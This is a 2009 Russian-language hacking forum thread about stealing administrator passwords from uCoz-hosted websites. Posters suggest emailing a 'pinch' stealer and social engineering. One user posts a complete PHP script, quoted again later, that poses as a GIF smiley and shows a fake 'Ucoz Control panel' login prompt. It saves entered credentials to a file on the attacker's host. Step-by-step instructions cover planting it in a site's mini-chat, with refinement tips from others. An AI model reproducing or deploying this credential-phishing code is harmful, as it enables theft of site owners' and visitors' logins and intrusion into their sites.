Взлом сайтов ucoz
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Взлом сайтов ucoz - 2009-03-05 13:34:30.366666
|
|
|
N!ke
Сообщений: 110
Оценки: 0
Присоединился: 2009-02-16 12:37:52.673333
|
Вот хотел спросить как можно сайты ucoza ломануть?? И получить пароль к админке?
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-05 13:58:19.453333
|
|
|
GооdShadow
Сообщений: 94
Оценки: 0
Присоединился: 2009-02-23 18:51:33.726666
|
quote:
ORIGINAL: N!ke
Вот хотел спросить как можно сайты ucoza ломануть?? И получить пароль к админке?
Сайт ucoz.ru тяжело ломануть админы следят за его обновлением [sm=ag.gif]
Если какой-то конкретный сайт на name.ucoz.ru попробуй пинч на мыло^^
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-05 14:03:52.986666
|
|
|
N!ke
Сообщений: 110
Оценки: 0
Присоединился: 2009-02-16 12:37:52.673333
|
Ну про пинч понятно а как узнать мыло??xD
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-05 15:14:49.130000
|
|
|
Vitalikxxx
Сообщений: 312
Оценки: 0
Присоединился: 2009-02-14 18:20:59.463333
|
СИ
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-05 15:20:55.066666
|
|
|
ilyha_hakeryga
Сообщений: 321
Оценки: 0
Присоединился: 2008-06-13 22:30:35.190000
|
А я взламывал при помощь php там скрипт который показывает панель а она сделана в картинке. Короче если надо узнать поподробнее в ICQ пиши.
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-05 15:25:03.396666
|
|
|
N!ke
Сообщений: 110
Оценки: 0
Присоединился: 2009-02-16 12:37:52.673333
|
Хоть icq бы оставил :)
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-05 19:38:20.516666
|
|
|
N!ke
Сообщений: 110
Оценки: 0
Присоединился: 2009-02-16 12:37:52.673333
|
Пацаны ну помогите хоть кто нибудь!!!!
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-05 19:43:17.153333
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
quote:
ORIGINAL: ilyha_hakeryga
А я взламывал при помощь php там скрипт который показывает панель а она сделана в картинке. Короче если надо узнать поподробнее в ICQ пиши.
Фэйк ?
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-05 19:52:30.026666
|
|
|
ilyha_hakeryga
Сообщений: 321
Оценки: 0
Присоединился: 2008-06-13 22:30:35.190000
|
Нет,я по типу как с античата,та видео есть на FTP заливашешь картинку,код и потом например в мини-чате появляется окошко типо введите пароль,если админ лоханёться введёт пароль то он отправиться тебе на FTP.
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-05 20:02:06.330000
|
|
|
N!ke
Сообщений: 110
Оценки: 0
Присоединился: 2009-02-16 12:37:52.673333
|
Ну это нада лохонутся а побаще предложения есть?? причём он не всегда кактит!!
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-06 04:09:27.736666
|
|
|
OO7SOM
Сообщений: 165
Оценки: 0
Присоединился: 2007-07-19 14:42:15.950000
|
quote:
ORIGINAL: VaZoNeZ
quote:
ORIGINAL: ilyha_hakeryga
А я взламывал при помощь php там скрипт который показывает панель а она сделана в картинке. Короче если надо узнать поподробнее в ICQ пиши.
Фэйк ?
да, при наличии чата с включенным отображением картинок
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-06 09:39:09.993333
|
|
|
N!ke
Сообщений: 110
Оценки: 0
Присоединился: 2009-02-16 12:37:52.673333
|
я смотрю не кто помочь не может (((((
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-07 22:30:53.386666
|
|
|
N!ke
Сообщений: 110
Оценки: 0
Присоединился: 2009-02-16 12:37:52.673333
|
ilyha_hakeryga дай асю!!
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-08 04:30:32.486666
|
|
|
.Aik.
Сообщений: 5
Оценки: 0
Присоединился: 2009-01-07 14:50:16.450000
|
N!ke,
Для начала нажно зарегистировать хост с поддержкой php (например http://mysite.phphost.net) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например : passwords.txt (сюда будут присылаться пассы пользователей похаканного сайта), и на файл smile.gif. Также скачайте любой смайлик в расширении .gif (типа cool.gif).
Затем откройте блокнот, да простой блокнот и напишите следующее:
<?
header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
}
elseif($login)
{
setcookie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>
Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif.
Теперь выбирайте любой юкозовский сайт, например http://target.ucoz.ru/ слева юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите логин, а в содержании сообщения напишите следующее:
И нажмите ОК. Если после этого в миничате вместо сообщения появился смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, (в этом примере это http://target.ucoz.ru/) будет появлятся форма в которую нужно будет ввести логин и пароль. У вас при входе на сайт такая форма будет появлятся тоже. И все, введеные логины и пароли в эту форму будут отсылатся в пустой файл passwords.txt, который вы создали в самом начале и залили на фтп.
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-08 08:28:20.420000
|
|
|
N!ke
Сообщений: 110
Оценки: 0
Присоединился: 2009-02-16 12:37:52.673333
|
.Aik.
Ок спс!! Хоть кто то чем то помог!!
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-08 08:34:03.953333
|
|
|
ilyha_hakeryga
Сообщений: 321
Оценки: 0
Присоединился: 2008-06-13 22:30:35.190000
|
Вот именно то что .Aik. написал я и делал
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-08 08:44:30.470000
|
|
|
N!ke
Сообщений: 110
Оценки: 0
Присоединился: 2009-02-16 12:37:52.673333
|
А какие права доступа поставить??
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-08 09:04:19.843333
|
|
|
ilyha_hakeryga
Сообщений: 321
Оценки: 0
Присоединился: 2008-06-13 22:30:35.190000
|
755
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-08 09:05:18.466666
|
|
|
N!ke
Сообщений: 110
Оценки: 0
Присоединился: 2009-02-16 12:37:52.673333
|
На все файлы??
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-08 20:07:53.773333
|
|
|
volt95
Сообщений: 177
Оценки: 0
Присоединился: 2008-10-06 09:56:17.150000
|
Просто взять и лоамнуть невозможно. Прийдётся покарячится, и скорее долго и много.
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-08 20:18:00.216666
|
|
|
N!ke
Сообщений: 110
Оценки: 0
Присоединился: 2009-02-16 12:37:52.673333
|
Ну это то понятно!! Для этого и назвали Взломать чтобы ломануть!! А не просто нажал кнопку и воля у тя пароль xD
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-09 21:30:50.126666
|
|
|
Sh1td0wn
Сообщений: 156
Оценки: 0
Присоединился: 2008-05-16 16:48:32.490000
|
я сниффером (вышеприведённый способ) ломал одного человека…..
ИМХО картинку лучше сделать 1*1 пиксель, прозрачную. Кстати, файлы .php тоже могут быть картинками ^^
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-21 00:26:57.576666
|
|
|
Terrans
Сообщений: 7
Оценки: 0
Присоединился: 2009-03-20 14:18:53.846666
|
quote:
ORIGINAL: .Aik.
N!ke,
Для начала нажно зарегистировать хост с поддержкой php (например http://mysite.phphost.net) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например : passwords.txt (сюда будут присылаться пассы пользователей похаканного сайта), и на файл smile.gif. Также скачайте любой смайлик в расширении .gif (типа cool.gif).
Затем откройте блокнот, да простой блокнот и напишите следующее:
<?
header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
}
elseif($login)
{
setcookie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>
Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif.
Теперь выбирайте любой юкозовский сайт, например http://target.ucoz.ru/ слева юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите логин, а в содержании сообщения напишите следующее:
И нажмите ОК. Если после этого в миничате вместо сообщения появился смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, (в этом примере это http://target.ucoz.ru/) будет появлятся форма в которую нужно будет ввести логин и пароль. У вас при входе на сайт такая форма будет появлятся тоже. И все, введеные логины и пароли в эту форму будут отсылатся в пустой файл passwords.txt, который вы создали в самом начале и залили на фтп.
Подскажи плиз что и куда вставлять.
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-21 01:13:08.900000
|
|
|
PXM
Сообщений: 78
Оценки: 0
Присоединился: 2009-01-30 18:05:04.060000
|
Уже не работает эта хрень на большенстве сайтов.Только натех у кого старый шаблон а новые уже бес этого это с 2007
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-21 09:52:00.310000
|
|
|
Terrans
Сообщений: 7
Оценки: 0
Присоединился: 2009-03-20 14:18:53.846666
|
Ппц и чо уже не как чоль админку не стыришь?
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-21 11:33:16.800000
|
|
|
.::Admin::.
Сообщений: 130
Оценки: 0
Присоединился: 2009-03-12 10:40:09.090000
|
фейк понятно а лохунутого админа создан, а вот можно ли пасс к админке брутом или както подобрать?
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-21 11:43:28.323333
|
|
|
Terrans
Сообщений: 7
Оценки: 0
Присоединился: 2009-03-20 14:18:53.846666
|
Скорее можно чем нет, но это по моему будет слишком долго, на античате еще есть много способов. http://forum.antichat.ru/threadnav100212-1-10-Ucoz.html
И говорят что взлом через мини чат уже устарел, да и куки админа нам не чего не дадут т.к. идет привязка к ip выходит что пароль админа пока не как не узнать.
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-21 11:57:44.443333
|
|
|
.::Admin::.
Сообщений: 130
Оценки: 0
Присоединился: 2009-03-12 10:40:09.090000
|
да лажа полная[:(]
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-21 11:59:17.440000
|
|
|
Terrans
Сообщений: 7
Оценки: 0
Присоединился: 2009-03-20 14:18:53.846666
|
Пойду пороюсь на дружественных хакерских мож чего найду, если что отпишусь.
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-21 12:46:18.056666
|
|
|
Terrans
Сообщений: 7
Оценки: 0
Присоединился: 2009-03-20 14:18:53.846666
|
Вообщем негеде не чего толком нету, кругом пи…дешь не по теме, ктонить норм объясните.
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-21 12:59:53.020000
|
|
|
Terrans
Сообщений: 7
Оценки: 0
Присоединился: 2009-03-20 14:18:53.846666
|
А почему при копировании ссылки на скрипт, получается не http а https?
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-21 19:15:47.150000
|
|
|
Terrans
Сообщений: 7
Оценки: 0
Присоединился: 2009-03-20 14:18:53.846666
|
Блин объясните куда скрипт вставлять, и ссылку на сайте на что вставлять.
|
|
|
|
|
RE: Взлом сайтов ucoz - 2009-03-21 21:42:48.583333
|
|
|
N!ke
Сообщений: 110
Оценки: 0
Присоединился: 2009-02-16 12:37:52.673333
|
Там же всё понятно !! Создаёшь txt файл вставляешь код и меняешь формат файла на gif !!! ссылку вставлять в чат будешь когда всё сделаешь и зальёшь файлы на ftp хост!! Ну я надеюсь разбёрешься как настраивать!
|
|
|
|
|
|
